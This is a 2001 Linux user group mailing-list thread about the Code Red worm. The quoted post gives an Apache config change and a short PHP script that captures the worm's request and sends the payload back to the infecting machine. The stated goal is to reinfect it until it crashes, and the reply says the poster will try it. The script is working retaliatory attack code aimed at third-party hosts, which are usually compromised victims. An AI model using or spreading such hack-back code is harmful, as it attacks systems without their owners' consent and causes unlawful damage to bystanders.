[olug] Code red

Adam Lassek hayai2 at home.com
Tue Aug 14 23:50:52 UTC 2001


That is really cool. I'm gonna have to try that.

On Tuesday 14 August 2001 18:16, you wrote:
> I've been asked multiple times what I am doing about the code red worm (
> and it predecessor ), so here is my story....
>
>
>
> Update your httpd.conf to include the extension .ida as a php file ( you
> have php installed right? ;-)
>
> E.g.
> #########
> AddType application/x-httpd-php .php .php3 .ida
> #########
>
>
>
> And create this nifty little file, named default.ida in the root of your
> web server directory:
>
> ##########################################
> <?
> $junk = getenv("QUERY_STRING");
> $infected = getenv("REMOTE_ADDR");
> $fp = fsockopen("$infected",80);
> fputs($fp, "GET /default.ida?$junk\r\n");
> fclose($fp);
> ?>
> ##########################################
>
>
> Apparently you can infect a box multiple times, and eventually it will
> crash itself ;-)
>
>
>
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: olug-unsubscribe at bstc.net
> For additional commands, e-mail: olug-help at bstc.net

---------------------------------------------------------------------
To unsubscribe, e-mail: olug-unsubscribe at bstc.net
For additional commands, e-mail: olug-help at bstc.net



More information about the OLUG mailing list